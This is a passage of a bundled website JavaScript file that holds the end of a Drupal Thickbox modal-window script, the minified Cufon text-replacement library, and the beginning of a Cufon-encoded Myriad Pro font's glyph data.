      if (url.indexOf('TB_iframe') != -1) { // either iframe or ajax window
        urlNoQuery = url.split('TB_');
        $('#TB_iframeContent').remove();
        if (params['modal'] != 'true') { //iframe no modal
          $('#TB_window').append('<div id="TB_title"><div id="TB_ajaxWindowTitle">' + caption + '</div><div id="TB_closeAjaxWindow"><a href="#" id="TB_closeWindowButton" title="' + settings.close + '">' + settings.close + '</a> ' + settings.esc_key + '</div></div><iframe frameborder="0" hspace="0" src="' + urlNoQuery[0] + '" id="TB_iframeContent" name="TB_iframeContent' + Math.round(Math.random()*1000) + '" onload="tb_showIframe()" style="width:' + (ajaxContentW + 29) + 'px;height:' + (ajaxContentH + 17) + 'px;"></iframe>');
        }
        else { //iframe modal
          $('#TB_overlay').unbind();
          $('#TB_window').append('<iframe frameborder="0" hspace="0" src="' + urlNoQuery[0] + '" id="TB_iframeContent" name="TB_iframeContent' + Math.round(Math.random()*1000) + '" onload="tb_showIframe()" style="width:' + (ajaxContentW + 29) + 'px;height:' + (ajaxContentH + 17) + 'px;"></iframe>');
        }
      }
      else { // not an iframe, ajax
        if ($('#TB_window').css('display') != 'block') {
          if (params['modal'] != 'true') { //ajax no modal
            $('#TB_window').append('<div id="TB_title"><div id="TB_ajaxWindowTitle">' + caption + '</div><div id="TB_closeAjaxWindow"><a href="#" id="TB_closeWindowButton" title="' + settings.close + '">' + settings.close + '</a> ' + settings.esc_key + '</div></div><div id="TB_ajaxContent" style="width:' + ajaxContentW + 'px;height:' + ajaxContentH + 'px"></div>');
            window.setTimeout("tb_focusFirstFormElement()", 1000);
          }
          else { //ajax modal
            $('#TB_overlay').unbind();
            $('#TB_window').append('<div id="TB_ajaxContent" class="TB_modal" style="width:' + ajaxContentW + 'px;height:' + ajaxContentH + 'px;"></div>');
          }
        }
        else { //this means the window is already up, we are just loading new content via ajax
          $('#TB_ajaxContent')[0].style.width = ajaxContentW + 'px';
          $('#TB_ajaxContent')[0].style.height = ajaxContentH + 'px';
          $('#TB_ajaxContent')[0].scrollTop = 0;
          $('#TB_ajaxWindowTitle').html(caption);
        }
      }

      $('#TB_closeWindowButton').click(tb_remove);

      if (url.indexOf('TB_inline') != -1) {
        $('#TB_ajaxContent').append($('#' + params['inlineId']).children());
        $('#TB_window').unload(function () {
          $('#' + params['inlineId']).append($('#TB_ajaxContent').children()); // move elements back when you're finished
        });
        tb_position();
        $('#TB_load').remove();
        $('#TB_window').css({display:'block', opacity: 0}).animate({opacity: 1}, 400);
      }
      else if (url.indexOf('TB_iframe') != -1) {
        tb_position();
        if ($.browser.safari || $.browserextra.iphone) { //safari needs help because it will not fire iframe onload
          $('#TB_load').remove();
          $('#TB_window').css({display:'block', opacity: 0}).animate({opacity: 1}, 400);
        }
      }
      else {
        $('#TB_ajaxContent').load(url += '&random=' + (new Date().getTime()),function() { //to do a post change this load method
          tb_position();
          $('#TB_load').remove();
          Drupal.attachBehaviors('#TB_ajaxContent');
          $('#TB_window').css({display:'block', opacity: 0}).animate({opacity: 1}, 400);
        });
      }
    }

    if (!params['modal']) {
      document.onkeyup = function(e) {
        if (e == null) { // ie
          keycode = event.keyCode;
          escapeKey = 27;
        }
        else if ($.browser.safari || $.browser.opera) { // safari or opera
          keycode = e.which;
          escapeKey = 27;
        }
        else { // mozilla
          keycode = e.keyCode;
          escapeKey = e.DOM_VK_ESCAPE;
        }
        key = String.fromCharCode(keycode).toLowerCase();
        if (keycode == escapeKey) { // close
          tb_remove();
        }
      };
    }

  }
  catch(e) {
    //nothing here
  }
}

//helper functions below
function tb_showIframe() {
  $('#TB_load').remove();
  $('#TB_window').css({display:'block', opacity: 0}).animate({opacity: 1}, 400);
}

function tb_remove() {
  $('#TB_imageOff').unbind('click');
  $('#TB_overlay').unbind('click');
  $('#TB_closeWindowButton').unbind('click');
  $('#TB_window').fadeOut(400,function() {$('#TB_window,#TB_overlay,#TB_HideSelect').trigger('unload').unbind().remove();});
  $('#TB_load').remove();
  if (typeof document.body.style.maxHeight == 'undefined') { //if IE 6
    $('body','html').css({height: 'auto', width: 'auto'});
    $('html').css('overflow','');
  }
  document.onkeydown = '';
  document.onkeyup = '';
  return false;
}

function tb_position() {
  $('#TB_window').css({marginLeft: '-' + parseInt((TB_WIDTH / 2),10) + 'px', width: TB_WIDTH + 'px'});
  if (!($.browserextra.msie6)) { // take away IE6
    $('#TB_window').css({marginTop: '-' + parseInt((TB_HEIGHT / 2),10) + 'px'});
  }
}

function tb_parseQuery( query ) {
  var Params = {};
  if ( ! query ) {return Params;}// return empty object
  var Pairs = query.split(/[;&]/);
  for ( var i = 0; i < Pairs.length; i++ ) {
    var KeyVal = Pairs[i].split('=');
    if ( ! KeyVal || KeyVal.length != 2 ) {continue;}
    var key = unescape( KeyVal[0] );
    var val = unescape( KeyVal[1] );
    val = val.replace(/\+/g, ' ');
    Params[key] = val;
  }
  return Params;
}

function tb_getPageSize() {
  var de = document.documentElement;
  var w = window.innerWidth || self.innerWidth || (de&&de.clientWidth) || document.body.clientWidth;
  var h = window.innerHeight || self.innerHeight || (de&&de.clientHeight) || document.body.clientHeight;
  arrayPageSize = [w,h];
  return arrayPageSize;
}

function tb_setBrowserExtra() {
  // Return if already set.
  if ($.browserextra) {
    return;
  }

  // Add iPhone, IE 6 and Mac Firefox browser detection.
  // msie6 fixes the fact that IE 7 now reports itself as MSIE 6.0 compatible
  var userAgent = navigator.userAgent.toLowerCase();
  $.browserextra = {
    iphone: /iphone/.test( userAgent ),
    msie6: /msie/.test( userAgent ) && !/opera/.test( userAgent ) && /msie 6\.0/.test( userAgent ) && !/msie 7\.0/.test( userAgent ) && !/msie 8\.0/.test( userAgent ),
    macfirefox: /mac/.test( userAgent ) && /firefox/.test( userAgent )
  };
}

function tb_focusFirstFormElement() {
  $('#TB_window form input[type=text]:first').focus();
}
;
/*
 * Copyright (c) 2009 Simo Kinnunen.
 * Licensed under the MIT license.
 *
 * @version 1.09i
 */
var Cufon=(function(){var m=function(){return m.replace.apply(null,arguments)};var x=m.DOM={ready:(function(){var C=false,E={loaded:1,complete:1};var B=[],D=function(){if(C){return}C=true;for(var F;F=B.shift();F()){}};if(document.addEventListener){document.addEventListener("DOMContentLoaded",D,false);window.addEventListener("pageshow",D,false)}if(!window.opera&&document.readyState){(function(){E[document.readyState]?D():setTimeout(arguments.callee,10)})()}if(document.readyState&&document.createStyleSheet){(function(){try{document.body.doScroll("left");D()}catch(F){setTimeout(arguments.callee,1)}})()}q(window,"load",D);return function(F){if(!arguments.length){D()}else{C?F():B.push(F)}}})(),root:function(){return document.documentElement||document.body}};var n=m.CSS={Size:function(C,B){this.value=parseFloat(C);this.unit=String(C).match(/[a-z%]*$/)[0]||"px";this.convert=function(D){return D/B*this.value};this.convertFrom=function(D){return D/this.value*B};this.toString=function(){return this.value+this.unit}},addClass:function(C,B){var D=C.className;C.className=D+(D&&" ")+B;return C},color:j(function(C){var B={};B.color=C.replace(/^rgba\((.*?),\s*([\d.]+)\)/,function(E,D,F){B.opacity=parseFloat(F);return"rgb("+D+")"});return B}),fontStretch:j(function(B){if(typeof B=="number"){return B}if(/%$/.test(B)){return parseFloat(B)/100}return{"ultra-condensed":0.5,"extra-condensed":0.625,condensed:0.75,"semi-condensed":0.875,"semi-expanded":1.125,expanded:1.25,"extra-expanded":1.5,"ultra-expanded":2}[B]||1}),getStyle:function(C){var B=document.defaultView;if(B&&B.getComputedStyle){return new a(B.getComputedStyle(C,null))}if(C.currentStyle){return new a(C.currentStyle)}return new a(C.style)},gradient:j(function(F){var G={id:F,type:F.match(/^-([a-z]+)-gradient\(/)[1],stops:[]},C=F.substr(F.indexOf("(")).match(/([\d.]+=)?(#[a-f0-9]+|[a-z]+\(.*?\)|[a-z]+)/ig);for(var E=0,B=C.length,D;E<B;++E){D=C[E].split("=",2).reverse();G.stops.push([D[1]||E/(B-1),D[0]])}return G}),quotedList:j(function(E){var D=[],C=/\s*((["'])([\s\S]*?[^\\])\2|[^,]+)\s*/g,B;while(B=C.exec(E)){D.push(B[3]||B[1])}return D}),recognizesMedia:j(function(G){var E=document.createElement("style"),D,C,B;E.type="text/css";E.media=G;try{E.appendChild(document.createTextNode("/**/"))}catch(F){}C=g("head")[0];C.insertBefore(E,C.firstChild);D=(E.sheet||E.styleSheet);B=D&&!D.disabled;C.removeChild(E);return B}),removeClass:function(D,C){var B=RegExp("(?:^|\\s+)"+C+"(?=\\s|$)","g");D.className=D.className.replace(B,"");return D},supports:function(D,C){var B=document.createElement("span").style;if(B[D]===undefined){return false}B[D]=C;return B[D]===C},textAlign:function(E,D,B,C){if(D.get("textAlign")=="right"){if(B>0){E=" "+E}}else{if(B<C-1){E+=" "}}return E},textShadow:j(function(F){if(F=="none"){return null}var E=[],G={},B,C=0;var D=/(#[a-f0-9]+|[a-z]+\(.*?\)|[a-z]+)|(-?[\d.]+[a-z%]*)|,/ig;while(B=D.exec(F)){if(B[0]==","){E.push(G);G={};C=0}else{if(B[1]){G.color=B[1]}else{G[["offX","offY","blur"][C++]]=B[2]}}}E.push(G);return E}),textTransform:(function(){var B={uppercase:function(C){return C.toUpperCase()},lowercase:function(C){return C.toLowerCase()},capitalize:function(C){return C.replace(/\b./g,function(D){return D.toUpperCase()})}};return function(E,D){var C=B[D.get("textTransform")];return C?C(E):E}})(),whiteSpace:(function(){var D={inline:1,"inline-block":1,"run-in":1};var C=/^\s+/,B=/\s+$/;return function(H,F,G,E){if(E){if(E.nodeName.toLowerCase()=="br"){H=H.replace(C,"")}}if(D[F.get("display")]){return H}if(!G.previousSibling){H=H.replace(C,"")}if(!G.nextSibling){H=H.replace(B,"")}return H}})()};n.ready=(function(){var B=!n.recognizesMedia("all"),E=false;var D=[],H=function(){B=true;for(var K;K=D.shift();K()){}};var I=g("link"),J=g("style");function C(K){return K.disabled||G(K.sheet,K.media||"screen")}function G(M,P){if(!n.recognizesMedia(P||"all")){return true}if(!M||M.disabled){return false}try{var Q=M.cssRules,O;if(Q){search:for(var L=0,K=Q.length;O=Q[L],L<K;++L){switch(O.type){case 2:break;case 3:if(!G(O.styleSheet,O.media.mediaText)){return false}break;default:break search}}}}catch(N){}return true}function F(){if(document.createStyleSheet){return true}var L,K;for(K=0;L=I[K];++K){if(L.rel.toLowerCase()=="stylesheet"&&!C(L)){return false}}for(K=0;L=J[K];++K){if(!C(L)){return false}}return true}x.ready(function(){if(!E){E=n.getStyle(document.body).isUsable()}if(B||(E&&F())){H()}else{setTimeout(arguments.callee,10)}});return function(K){if(B){K()}else{D.push(K)}}})();function s(D){var C=this.face=D.face,B={"\u0020":1,"\u00a0":1,"\u3000":1};this.glyphs=D.glyphs;this.w=D.w;this.baseSize=parseInt(C["units-per-em"],10);this.family=C["font-family"].toLowerCase();this.weight=C["font-weight"];this.style=C["font-style"]||"normal";this.viewBox=(function(){var F=C.bbox.split(/\s+/);var E={minX:parseInt(F[0],10),minY:parseInt(F[1],10),maxX:parseInt(F[2],10),maxY:parseInt(F[3],10)};E.width=E.maxX-E.minX;E.height=E.maxY-E.minY;E.toString=function(){return[this.minX,this.minY,this.width,this.height].join(" ")};return E})();this.ascent=-parseInt(C.ascent,10);this.descent=-parseInt(C.descent,10);this.height=-this.ascent+this.descent;this.spacing=function(L,N,E){var O=this.glyphs,M,K,G,P=[],F=0,J=-1,I=-1,H;while(H=L[++J]){M=O[H]||this.missingGlyph;if(!M){continue}if(K){F-=G=K[H]||0;P[I]-=G}F+=P[++I]=~~(M.w||this.w)+N+(B[H]?E:0);K=M.k}P.total=F;return P}}function f(){var C={},B={oblique:"italic",italic:"oblique"};this.add=function(D){(C[D.style]||(C[D.style]={}))[D.weight]=D};this.get=function(H,I){var G=C[H]||C[B[H]]||C.normal||C.italic||C.oblique;if(!G){return null}I={normal:400,bold:700}[I]||parseInt(I,10);if(G[I]){return G[I]}var E={1:1,99:0}[I%100],K=[],F,D;if(E===undefined){E=I>400}if(I==500){I=400}for(var J in G){if(!k(G,J)){continue}J=parseInt(J,10);if(!F||J<F){F=J}if(!D||J>D){D=J}K.push(J)}if(I<F){I=F}if(I>D){I=D}K.sort(function(M,L){return(E?(M>=I&&L>=I)?M<L:M>L:(M<=I&&L<=I)?M>L:M<L)?-1:1});return G[K[0]]}}function r(){function D(F,G){if(F.contains){return F.contains(G)}return F.compareDocumentPosition(G)&16}function B(G){var F=G.relatedTarget;if(!F||D(this,F)){return}C(this,G.type=="mouseover")}function E(F){C(this,F.type=="mouseenter")}function C(F,G){setTimeout(function(){var H=d.get(F).options;m.replace(F,G?h(H,H.hover):H,true)},10)}this.attach=function(F){if(F.onmouseenter===undefined){q(F,"mouseover",B);q(F,"mouseout",B)}else{q(F,"mouseenter",E);q(F,"mouseleave",E)}}}function u(){var C=[],D={};function B(H){var E=[],G;for(var F=0;G=H[F];++F){E[F]=C[D[G]]}return E}this.add=function(F,E){D[F]=C.push(E)-1};this.repeat=function(){var E=arguments.length?B(arguments):C,F;for(var G=0;F=E[G++];){m.replace(F[0],F[1],true)}}}function A(){var D={},B=0;function C(E){return E.cufid||(E.cufid=++B)}this.get=function(E){var F=C(E);return D[F]||(D[F]={})}}function a(B){var D={},C={};this.extend=function(E){for(var F in E){if(k(E,F)){D[F]=E[F]}}return this};this.get=function(E){return D[E]!=undefined?D[E]:B[E]};this.getSize=function(F,E){return C[F]||(C[F]=new n.Size(this.get(F),E))};this.isUsable=function(){return !!B}}function q(C,B,D){if(C.addEventListener){C.addEventListener(B,D,false)}else{if(C.attachEvent){C.attachEvent("on"+B,function(){return D.call(C,window.event)})}}}function v(C,B){var D=d.get(C);if(D.options){return C}if(B.hover&&B.hoverables[C.nodeName.toLowerCase()]){b.attach(C)}D.options=B;return C}function j(B){var C={};return function(D){if(!k(C,D)){C[D]=B.apply(null,arguments)}return C[D]}}function c(F,E){var B=n.quotedList(E.get("fontFamily").toLowerCase()),D;for(var C=0;D=B[C];++C){if(i[D]){return i[D].get(E.get("fontStyle"),E.get("fontWeight"))}}return null}function g(B){return document.getElementsByTagName(B)}function k(C,B){return C.hasOwnProperty(B)}function h(){var C={},B,F;for(var E=0,D=arguments.length;B=arguments[E],E<D;++E){for(F in B){if(k(B,F)){C[F]=B[F]}}}return C}function o(E,M,C,N,F,D){var K=document.createDocumentFragment(),H;if(M===""){return K}var L=N.separate;var I=M.split(p[L]),B=(L=="words");if(B&&t){if(/^\s/.test(M)){I.unshift("")}if(/\s$/.test(M)){I.push("")}}for(var J=0,G=I.length;J<G;++J){H=z[N.engine](E,B?n.textAlign(I[J],C,J,G):I[J],C,N,F,D,J<G-1);if(H){K.appendChild(H)}}return K}function l(D,M){var C=D.nodeName.toLowerCase();if(M.ignore[C]){return}var E=!M.textless[C];var B=n.getStyle(v(D,M)).extend(M);var F=c(D,B),G,K,I,H,L,J;if(!F){return}for(G=D.firstChild;G;G=I){K=G.nodeType;I=G.nextSibling;if(E&&K==3){if(H){H.appendData(G.data);D.removeChild(G)}else{H=G}if(I){continue}}if(H){D.replaceChild(o(F,n.whiteSpace(H.data,B,H,J),B,M,G,D),H);H=null}if(K==1){if(G.firstChild){if(G.nodeName.toLowerCase()=="cufon"){z[M.engine](F,null,B,M,G,D)}else{arguments.callee(G,M)}}J=G}}}var t=" ".split(/\s+/).length==0;var d=new A();var b=new r();var y=new u();var e=false;var z={},i={},w={autoDetect:false,engine:null,forceHitArea:false,hover:false,hoverables:{a:true},ignore:{applet:1,canvas:1,col:1,colgroup:1,head:1,iframe:1,map:1,optgroup:1,option:1,script:1,select:1,style:1,textarea:1,title:1,pre:1},printable:true,selector:(window.Sizzle||(window.jQuery&&function(B){return jQuery(B)})||(window.dojo&&dojo.query)||(window.Ext&&Ext.query)||(window.YAHOO&&YAHOO.util&&YAHOO.util.Selector&&YAHOO.util.Selector.query)||(window.$$&&function(B){return $$(B)})||(window.$&&function(B){return $(B)})||(document.querySelectorAll&&function(B){return document.querySelectorAll(B)})||g),separate:"words",textless:{dl:1,html:1,ol:1,table:1,tbody:1,thead:1,tfoot:1,tr:1,ul:1},textShadow:"none"};var p={words:/\s/.test("\u00a0")?/[^\S\u00a0]+/:/\s+/,characters:"",none:/^/};m.now=function(){x.ready();return m};m.refresh=function(){y.repeat.apply(y,arguments);return m};m.registerEngine=function(C,B){if(!B){return m}z[C]=B;return m.set("engine",C)};m.registerFont=function(D){if(!D){return m}var B=new s(D),C=B.family;if(!i[C]){i[C]=new f()}i[C].add(B);return m.set("fontFamily",'"'+C+'"')};m.replace=function(D,C,B){C=h(w,C);if(!C.engine){return m}if(!e){n.addClass(x.root(),"cufon-active cufon-loading");n.ready(function(){n.addClass(n.removeClass(x.root(),"cufon-loading"),"cufon-ready")});e=true}if(C.hover){C.forceHitArea=true}if(C.autoDetect){delete C.fontFamily}if(typeof C.textShadow=="string"){C.textShadow=n.textShadow(C.textShadow)}if(typeof C.color=="string"&&/^-/.test(C.color)){C.textGradient=n.gradient(C.color)}else{delete C.textGradient}if(!B){y.add(D,arguments)}if(D.nodeType||typeof D=="string"){D=[D]}n.ready(function(){for(var F=0,E=D.length;F<E;++F){var G=D[F];if(typeof G=="string"){m.replace(C.selector(G),C,true)}else{l(G,C)}}});return m};m.set=function(B,C){w[B]=C;return m};return m})();Cufon.registerEngine("vml",(function(){var e=document.namespaces;if(!e){return}e.add("cvml","urn:schemas-microsoft-com:vml");e=null;var b=document.createElement("cvml:shape");b.style.behavior="url(#default#VML)";if(!b.coordsize){return}b=null;var h=(document.documentMode||0)<8;document.write(('<style type="text/css">cufoncanvas{text-indent:0;}@media screen{cvml\\:shape,cvml\\:rect,cvml\\:fill,cvml\\:shadow{behavior:url(#default#VML);display:block;antialias:true;position:absolute;}cufoncanvas{position:absolute;text-align:left;}cufon{display:inline-block;position:relative;vertical-align:'+(h?"middle":"text-bottom")+";}cufon cufontext{position:absolute;left:-10000in;font-size:1px;}a cufon{cursor:pointer}}@media print{cufon cufoncanvas{display:none;}}</style>").replace(/;/g,"!important;"));function c(i,j){return a(i,/(?:em|ex|%)$|^[a-z-]+$/i.test(j)?"1em":j)}function a(l,m){if(m==="0"){return 0}if(/px$/i.test(m)){return parseFloat(m)}var k=l.style.left,j=l.runtimeStyle.left;l.runtimeStyle.left=l.currentStyle.left;l.style.left=m.replace("%","em");var i=l.style.pixelLeft;l.style.left=k;l.runtimeStyle.left=j;return i}function f(l,k,j,n){var i="computed"+n,m=k[i];if(isNaN(m)){m=k.get(n);k[i]=m=(m=="normal")?0:~~j.convertFrom(a(l,m))}return m}var g={};function d(p){var q=p.id;if(!g[q]){var n=p.stops,o=document.createElement("cvml:fill"),i=[];o.type="gradient";o.angle=180;o.focus="0";o.method="sigma";o.color=n[0][1];for(var m=1,l=n.length-1;m<l;++m){i.push(n[m][0]*100+"% "+n[m][1])}o.colors=i.join(",");o.color2=n[l][1];g[q]=o}return g[q]}return function(ac,G,Y,C,K,ad,W){var n=(G===null);if(n){G=K.alt}var I=ac.viewBox;var p=Y.computedFontSize||(Y.computedFontSize=new Cufon.CSS.Size(c(ad,Y.get("fontSize"))+"px",ac.baseSize));var y,q;if(n){y=K;q=K.firstChild}else{y=document.createElement("cufon");y.className="cufon cufon-vml";y.alt=G;q=document.createElement("cufoncanvas");y.appendChild(q);if(C.printable){var Z=document.createElement("cufontext");Z.appendChild(document.createTextNode(G));y.appendChild(Z)}if(!W){y.appendChild(document.createElement("cvml:shape"))}}var ai=y.style;var R=q.style;var l=p.convert(I.height),af=Math.ceil(l);var V=af/l;var P=V*Cufon.CSS.fontStretch(Y.get("fontStretch"));var U=I.minX,T=I.minY;R.height=af;R.top=Math.round(p.convert(T-ac.ascent));R.left=Math.round(p.convert(U));ai.height=p.convert(ac.height)+"px";var F=Y.get("color");var ag=Cufon.CSS.textTransform(G,Y).split("");var L=ac.spacing(ag,f(ad,Y,p,"letterSpacing"),f(ad,Y,p,"wordSpacing"));if(!L.length){return null}var k=L.total;var x=-U+k+(I.width-L[L.length-1]);var ah=p.convert(x*P),X=Math.round(ah);var O=x+","+I.height,m;var J="r"+O+"ns";var u=C.textGradient&&d(C.textGradient);var o=ac.glyphs,S=0;var H=C.textShadow;var ab=-1,aa=0,w;while(w=ag[++ab]){var D=o[ag[ab]]||ac.missingGlyph,v;if(!D){continue}if(n){v=q.childNodes[aa];while(v.firstChild){v.removeChild(v.firstChild)}}else{v=document.createElement("cvml:shape");q.appendChild(v)}v.stroked="f";v.coordsize=O;v.coordorigin=m=(U-S)+","+T;v.path=(D.d?"m"+D.d+"xe":"")+"m"+m+J;v.fillcolor=F;if(u){v.appendChild(u.cloneNode(false))}var ae=v.style;ae.width=X;ae.height=af;if(H){var s=H[0],r=H[1];var B=Cufon.CSS.color(s.color),z;var N=document.createElement("cvml:shadow");N.on="t";N.color=B.color;N.offset=s.offX+","+s.offY;if(r){z=Cufon.CSS.color(r.color);N.type="double";N.color2=z.color;N.offset2=r.offX+","+r.offY}N.opacity=B.opacity||(z&&z.opacity)||1;v.appendChild(N)}S+=L[aa++]}var M=v.nextSibling,t,A;if(C.forceHitArea){if(!M){M=document.createElement("cvml:rect");M.stroked="f";M.className="cufon-vml-cover";t=document.createElement("cvml:fill");t.opacity=0;M.appendChild(t);q.appendChild(M)}A=M.style;A.width=X;A.height=af}else{if(M){q.removeChild(M)}}ai.width=Math.max(Math.ceil(p.convert(k*P)),0);if(h){var Q=Y.computedYAdjust;if(Q===undefined){var E=Y.get("lineHeight");if(E=="normal"){E="1em"}else{if(!isNaN(E)){E+="em"}}Y.computedYAdjust=Q=0.5*(a(ad,E)-parseFloat(ai.height))}if(Q){ai.marginTop=Math.ceil(Q)+"px";ai.marginBottom=Q+"px"}}return y}})());Cufon.registerEngine("canvas",(function(){var b=document.createElement("canvas");if(!b||!b.getContext||!b.getContext.apply){return}b=null;var a=Cufon.CSS.supports("display","inline-block");var e=!a&&(document.compatMode=="BackCompat"||/frameset|transitional/i.test(document.doctype.publicId));var f=document.createElement("style");f.type="text/css";f.appendChild(document.createTextNode(("cufon{text-indent:0;}@media screen,projection{cufon{display:inline;display:inline-block;position:relative;vertical-align:middle;"+(e?"":"font-size:1px;line-height:1px;")+"}cufon cufontext{display:-moz-inline-box;display:inline-block;width:0;height:0;overflow:hidden;text-indent:-10000in;}"+(a?"cufon canvas{position:relative;}":"cufon canvas{position:absolute;}")+"}@media print{cufon{padding:0;}cufon canvas{display:none;}}").replace(/;/g,"!important;")));document.getElementsByTagName("head")[0].appendChild(f);function d(p,h){var n=0,m=0;var g=[],o=/([mrvxe])([^a-z]*)/g,k;generate:for(var j=0;k=o.exec(p);++j){var l=k[2].split(",");switch(k[1]){case"v":g[j]={m:"bezierCurveTo",a:[n+~~l[0],m+~~l[1],n+~~l[2],m+~~l[3],n+=~~l[4],m+=~~l[5]]};break;case"r":g[j]={m:"lineTo",a:[n+=~~l[0],m+=~~l[1]]};break;case"m":g[j]={m:"moveTo",a:[n=~~l[0],m=~~l[1]]};break;case"x":g[j]={m:"closePath"};break;case"e":break generate}h[g[j].m].apply(h,g[j].a)}return g}function c(m,k){for(var j=0,h=m.length;j<h;++j){var g=m[j];k[g.m].apply(k,g.a)}}return function(V,w,P,t,C,W){var k=(w===null);if(k){w=C.getAttribute("alt")}var A=V.viewBox;var m=P.getSize("fontSize",V.baseSize);var B=0,O=0,N=0,u=0;var z=t.textShadow,L=[];if(z){for(var U=z.length;U--;){var F=z[U];var K=m.convertFrom(parseFloat(F.offX));var I=m.convertFrom(parseFloat(F.offY));L[U]=[K,I];if(I<B){B=I}if(K>O){O=K}if(I>N){N=I}if(K<u){u=K}}}var Z=Cufon.CSS.textTransform(w,P).split("");var E=V.spacing(Z,~~m.convertFrom(parseFloat(P.get("letterSpacing"))||0),~~m.convertFrom(parseFloat(P.get("wordSpacing"))||0));if(!E.length){return null}var h=E.total;O+=A.width-E[E.length-1];u+=A.minX;var s,n;if(k){s=C;n=C.firstChild}else{s=document.createElement("cufon");s.className="cufon cufon-canvas";s.setAttribute("alt",w);n=document.createElement("canvas");s.appendChild(n);if(t.printable){var S=document.createElement("cufontext");S.appendChild(document.createTextNode(w));s.appendChild(S)}}var aa=s.style;var H=n.style;var j=m.convert(A.height);var Y=Math.ceil(j);var M=Y/j;var G=M*Cufon.CSS.fontStretch(P.get("fontStretch"));var J=h*G;var Q=Math.ceil(m.convert(J+O-u));var o=Math.ceil(m.convert(A.height-B+N));n.width=Q;n.height=o;H.width=Q+"px";H.height=o+"px";B+=A.minY;H.top=Math.round(m.convert(B-V.ascent))+"px";H.left=Math.round(m.convert(u))+"px";var r=Math.max(Math.ceil(m.convert(J)),0)+"px";if(a){aa.width=r;aa.height=m.convert(V.height)+"px"}else{aa.paddingLeft=r;aa.paddingBottom=(m.convert(V.height)-1)+"px"}var X=n.getContext("2d"),D=j/A.height;X.scale(D,D*M);X.translate(-u,-B);X.save();function T(){var x=V.glyphs,ab,l=-1,g=-1,y;X.scale(G,1);while(y=Z[++l]){var ab=x[Z[l]]||V.missingGlyph;if(!ab){continue}if(ab.d){X.beginPath();if(ab.code){c(ab.code,X)}else{ab.code=d("m"+ab.d,X)}X.fill()}X.translate(E[++g],0)}X.restore()}if(z){for(var U=z.length;U--;){var F=z[U];X.save();X.fillStyle=F.color;X.translate.apply(X,L[U]);T()}}var q=t.textGradient;if(q){var v=q.stops,p=X.createLinearGradient(0,A.minY,0,A.maxY);for(var U=0,R=v.length;U<R;++U){p.addColorStop.apply(p,v[U])}X.fillStyle=p}else{X.fillStyle=P.get("color")}T();return s}})());;
/*!
 * The following copyright notice may not be removed under any circumstances.
 * 
 * Copyright:
 * © 1992, 1994, 1997, 2000, 2004 Adobe Systems Incorporated. All rights reserved.
 * Protected by U.S. Patents D454,582.
 * 
 * Trademark:
 * Myriad is either a registered trademark or a trademark of Adobe Systems
 * Incorporated in the United States and/or other countries.
 * 
 * Full name:
 * MyriadPro-Regular
 * 
 * Designer:
 * Robert Slimbach and Carol Twombly
 * 
 * Vendor URL:
 * http://www.adobe.com/type
 * 
 * License information:
 * http://www.adobe.com/type/legal.html
 */
Cufon.registerFont((function(f){var b=_cufon_bridge_={p:[{"d":"6,0r0,-18r102,-131r-94,0r0,-25r132,0r0,20r-100,129r102,0r0,25r-142,0","w":154,"k":{"T":7,"c":3,"d":3,"e":3,"o":3,"q":3,"v":-9,"w":-9,"y":-9}},{"d":"30,-174v-6,-58,35,-101,89,-81r-4,25v-36,-15,-60,13,-54,56r42,0r0,24r-42,0r0,150r-31,0r0,-150r-25,0r0,-24r25,0","w":105,"k":{"g":4,"c":5,"d":5,"e":5,"o":5,"q":5,"s":3,"t":-4,":":-12,";":-12,")":-37,"]":-37,"}":-37,"\"":-20,"'":-20,",":12,".":12}},{"d":"0,27r180,0r0,18r-180,0r0,-18","w":180},{"d":"73,0r0,-216r-73,0r0,-27r179,0r0,27r-74,0r0,216r-32,0","w":178,"k":{"i":16,"T":-14,"J":15,"C":10,"G":10,"O":10,"Q":10,"V":-14,"W":-14,"X":-8,"Y":-10,"A":27,"S":2,"a":23,"g":23,"b":3,"h":3,"k":3,"l":3,"m":16,"n":16,"p":16,"r":16,"c":26,"d":26,"e":26,"o":26,"q":26,"s":19,"u":16,"v":14,"w":14,"y":14,"z":18,"x":12,":":9,";":9,"-":18,")":-22,"]":-22,"}":-22,"\"":-6,"'":-6,",":22,".":22}},{"d":"24,-86r0,-19r167,-87r0,25r-141,72r141,70r0,25","w":214},{"d":"191,-106r0,20r-167,86r0,-25r142,-71r-142,-71r0,-25","w":214},{"d":"26,0r0,-256r32,0r0,256r-32,0","w":84,"k":{",":4,".":4}},{"d":"103,-152v-63,0,-42,91,-45,152r-32,0r-1,-174r28,0r2,29v27,-45,119,-55,120,41r0,104r-32,0v-6,-59,22,-152,-40,-152","w":199,"k":{"T":18,"t":1,"v":5,"w":5,"y":5,"\"":3,"'":3}},{"d":"103,-152v-63,0,-42,91,-45,152r-32,0r0,-256r32,0r1,109v29,-45,116,-51,116,43r0,104r-32,0v-6,-59,22,-152,-40,-152","w":199,"k":{"T":18,"t":1,"v":5,"w":5,"y":5,"\"":3,"'":3}},{"d":"6,-174r35,0r44,65r41,-65r35,0r-59,84r60,90r-35,0r-46,-69v-13,24,-29,46,-43,69r-35,0r62,-89","w":166,"k":{"T":8,"c":5,"d":5,"e":5,"o":5,"q":5,"s":2,"t":-5,"v":-5,"w":-5,"y":-5,"-":2}},{"d":"18,-249r32,0r-6,86r-20,0","w":67,"k":{"T":-6,"J":21,"M":2,"C":1,"G":1,"O":1,"Q":1,"V":-6,"W":-6,"Y":-1,"A":22,"f":-9,"g":4,"c":3,"d":3,"e":3,"o":3,"q":3,"t":-9,"v":-8,"w":-8,"y":-8,",":41,".":41}},{"d":"193,-68r-25,0r-61,-140r-60,140r-25,0r74,-166r23,0","w":214},{"d":"7,-247r66,0r0,287r-66,0r0,-19r41,0r0,-248r-41,0r0,-20","w":102},{"w":76,"k":{"T":15,"V":13,"W":13,"Y":17}},{"d":"112,-147v-68,-12,-53,82,-54,147r-32,0r-1,-174r28,0v1,11,-1,25,2,34v10,-25,30,-42,57,-37r0,30","w":117,"k":{"T":5,"a":2,"f":-11,"g":3,"b":-1,"h":-1,"k":-1,"l":-1,"i":-1,"m":-1,"n":-1,"p":-1,"r":-1,"c":4,"d":4,"e":4,"o":4,"q":4,"t":-9,"v":-9,"w":-9,"y":-9,"z":-3,"x":-6,":":-3,";":-3,"-":2,",":19,".":19}},{"d":"68,-92r37,0r7,-52r-37,0xm55,0r-21,0r9,-71r-30,0r0,-21r33,0r7,-52r-31,0r0,-21r34,0r10,-69r21,0r-10,69r38,0r9,-69r21,0r-9,69r30,0r0,21r-33,0r-6,52r31,0r0,21r-35,0r-9,71r-21,0r9,-71r-38,0","w":178},{